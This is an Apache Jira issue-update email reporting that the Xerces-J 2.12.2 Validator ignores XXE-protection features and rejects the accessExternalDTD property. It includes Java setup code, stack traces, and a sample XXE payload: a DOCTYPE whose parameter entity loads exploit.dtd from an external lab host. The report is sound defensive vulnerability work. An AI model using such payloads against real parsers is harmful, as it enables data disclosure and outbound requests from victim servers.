[
https://issues.apache.org/jira/browse/XERCESJ-1758?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Samuel Hailemichael updated XERCESJ-1758:
-----------------------------------------
Description:
During the implementation of Validator using apache xerces, setting features
that prevent XML External Entity are not working. When parsing through an XML
file, I consistently get DNS callbacks when attempting to load an external dtd
with a DOCTYPE declaration. I am using the latest xerces version(2.12.2)
{*}{{*}}{*}Attempt 1{*}
{code:java}
SchemaFactory factory =
SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema";);
Schema schema = factory.newSchema(schemaSources);
Validator validator = schema.newValidator();
validator.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);
validator.setFeature("http://xml.org/sax/features/external-general-entities";,
false);
validator.setFeature("http://xml.org/sax/features/external-parameter-entities";,
false);
validator.validate(new StreamSource(new ByteArrayInputStream(<xml file in byte
Array form that contains DOCTYPE>)));{code}
sample XML file
{code:java}
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd";>
%xxe;]> {code}
When using a validator it doesn't throw a fatal error exception when a document
containing a DOCTYPE declaration is being parsed. Here's an example of an
outbound call when an XML file containing a DOCTYPE declaration is being parsed
through the validator.
{code:java}
Caused by: java.io.IOException: Server returned HTTP response code: 403 for
URL:
https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd
at
sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1914)
at
sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1512)
at
sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(HttpsURLConnectionImpl.java:268)
at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity(Unknown
Source)
at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.startPE(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.skipSeparator(Unknown
Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.scanDecls(Unknown Source)
at
org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset(Unknown Source)
at
org.apache.xerces.impl.XMLDocumentScannerImpl$DTDDispatcher.dispatch(Unknown
Source)
at
org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown
Source)
at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
at
org.apache.xerces.jaxp.validation.StreamValidatorHelper.validate(Unknown Source)
at org.apache.xerces.jaxp.validation.ValidatorImpl.validate(Unknown
Source)
at javax.xml.validation.Validator.validate(Validator.java:124) {code}
Instead of an outbound call, it should throw an exception for a DOCTYPE
declation on the xml file. **
*Attempt 2*
{code:java}
SchemaFactory factory =
SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema";);
Schema schema = factory.newSchema();
Validator validator = schema.newValidator();
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
validator.validate(new StreamSource(new ByteArrayInputStream(<byte Array>)));
{code}
This implementation is the recommended way for external entity prevention for
validators but gives this error when implemented with xerces.
https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#validator
{code:java}
org.xml.sax.SAXNotRecognizedException: Property
'http://javax.xml.XMLConstants/property/accessExternalDTD' is not recognized.
at org.apache.xerces.jaxp.validation.ValidatorImpl.setProperty(Unknown
Source) {code}
was:
During the implementation of Validator using apache xerces, setting features
that prevent XML External Entity are not working. When parsing through an XML
file, I consistently get DNS callbacks when attempting to load an external dtd
with a DOCTYPE declaration.
{*}{*}{*}Attempt 1{*}
{code:java}
SchemaFactory factory =
SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema";);
Schema schema = factory.newSchema(schemaSources);
Validator validator = schema.newValidator();
validator.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);
validator.setFeature("http://xml.org/sax/features/external-general-entities";,
false);
validator.setFeature("http://xml.org/sax/features/external-parameter-entities";,
false);
validator.validate(new StreamSource(new ByteArrayInputStream(<xml file in byte
Array form that contains DOCTYPE>)));{code}
When using a validator it doesn't throw a fatal error exception when a document
containing a DOCTYPE declaration is being parsed. Here's an example of an
outbound call when an XML file containing a DOCTYPE declaration is being parsed
through the validator.
{code:java}
Caused by: java.io.IOException: Server returned HTTP response code: 403 for
URL:
https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd
at
sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1914)
at
sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1512)
at
sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(HttpsURLConnectionImpl.java:268)
at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity(Unknown
Source)
at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.startPE(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.skipSeparator(Unknown
Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.scanDecls(Unknown Source)
at
org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset(Unknown Source)
at
org.apache.xerces.impl.XMLDocumentScannerImpl$DTDDispatcher.dispatch(Unknown
Source)
at
org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown
Source)
at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
at
org.apache.xerces.jaxp.validation.StreamValidatorHelper.validate(Unknown Source)
at org.apache.xerces.jaxp.validation.ValidatorImpl.validate(Unknown
Source)
at javax.xml.validation.Validator.validate(Validator.java:124) {code}
Instead of an outbound call, it should throw an exception for a DOCTYPE
declation on the xml file. **
*Attempt 2*
{code:java}
SchemaFactory factory =
SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema";);
Schema schema = factory.newSchema();
Validator validator = schema.newValidator();
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
validator.validate(new StreamSource(new ByteArrayInputStream(<byte Array>)));
{code}
This implementation is the recommended way for external entity prevention for
validators but gives this error when implemented with xerces.
{code:java}
org.xml.sax.SAXNotRecognizedException: Property
'http://javax.xml.XMLConstants/property/accessExternalDTD' is not recognized.
at org.apache.xerces.jaxp.validation.ValidatorImpl.setProperty(Unknown
Source) {code}
> XML validator xxe vulnerability
> -------------------------------
>
> Key: XERCESJ-1758
> URL: https://issues.apache.org/jira/browse/XERCESJ-1758
> Project: Xerces2-J
> Issue Type: Bug
> Components: JAXP (javax.xml.validation)
> Reporter: Samuel Hailemichael
> Priority: Major
>
> During the implementation of Validator using apache xerces, setting features
> that prevent XML External Entity are not working. When parsing through an
> XML file, I consistently get DNS callbacks when attempting to load an
> external dtd with a DOCTYPE declaration. I am using the latest xerces
> version(2.12.2)
> {*}{{*}}{*}Attempt 1{*}
> {code:java}
> SchemaFactory factory =
> SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema";);
> Schema schema = factory.newSchema(schemaSources);
> Validator validator = schema.newValidator();
>
> validator.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);
>
> validator.setFeature("http://xml.org/sax/features/external-general-entities";,
> false);
>
> validator.setFeature("http://xml.org/sax/features/external-parameter-entities";,
> false);
> validator.validate(new StreamSource(new ByteArrayInputStream(<xml file in
> byte Array form that contains DOCTYPE>)));{code}
> sample XML file
> {code:java}
> <?xml version="1.0"?>
> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM
> "https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd";>
> %xxe;]> {code}
> When using a validator it doesn't throw a fatal error exception when a
> document containing a DOCTYPE declaration is being parsed. Here's an example
> of an outbound call when an XML file containing a DOCTYPE declaration is
> being parsed through the validator.
> {code:java}
> Caused by: java.io.IOException: Server returned HTTP response code: 403 for
> URL:
> https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd
> at
> sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1914)
> at
> sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1512)
> at
> sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(HttpsURLConnectionImpl.java:268)
> at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity(Unknown
> Source)
> at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
> at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
> at org.apache.xerces.impl.XMLDTDScannerImpl.startPE(Unknown Source)
> at org.apache.xerces.impl.XMLDTDScannerImpl.skipSeparator(Unknown
> Source)
> at org.apache.xerces.impl.XMLDTDScannerImpl.scanDecls(Unknown Source)
> at
> org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset(Unknown Source)
> at
> org.apache.xerces.impl.XMLDocumentScannerImpl$DTDDispatcher.dispatch(Unknown
> Source)
> at
> org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown
> Source)
> at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
> at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
> at
> org.apache.xerces.jaxp.validation.StreamValidatorHelper.validate(Unknown
> Source)
> at org.apache.xerces.jaxp.validation.ValidatorImpl.validate(Unknown
> Source)
> at javax.xml.validation.Validator.validate(Validator.java:124) {code}
> Instead of an outbound call, it should throw an exception for a DOCTYPE
> declation on the xml file. **
> *Attempt 2*
> {code:java}
> SchemaFactory factory =
> SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema";);
> Schema schema = factory.newSchema();
> Validator validator = schema.newValidator();
> validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
> validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
> validator.validate(new StreamSource(new ByteArrayInputStream(<byte Array>)));
> {code}
> This implementation is the recommended way for external entity prevention for
> validators but gives this error when implemented with xerces.
> https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#validator
> {code:java}
> org.xml.sax.SAXNotRecognizedException: Property
> 'http://javax.xml.XMLConstants/property/accessExternalDTD' is not recognized.
> at org.apache.xerces.jaxp.validation.ValidatorImpl.setProperty(Unknown
> Source) {code}
>
>
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: j-dev-unsubscr...@xerces.apache.org
For additional commands, e-mail: j-dev-h...@xerces.apache.org
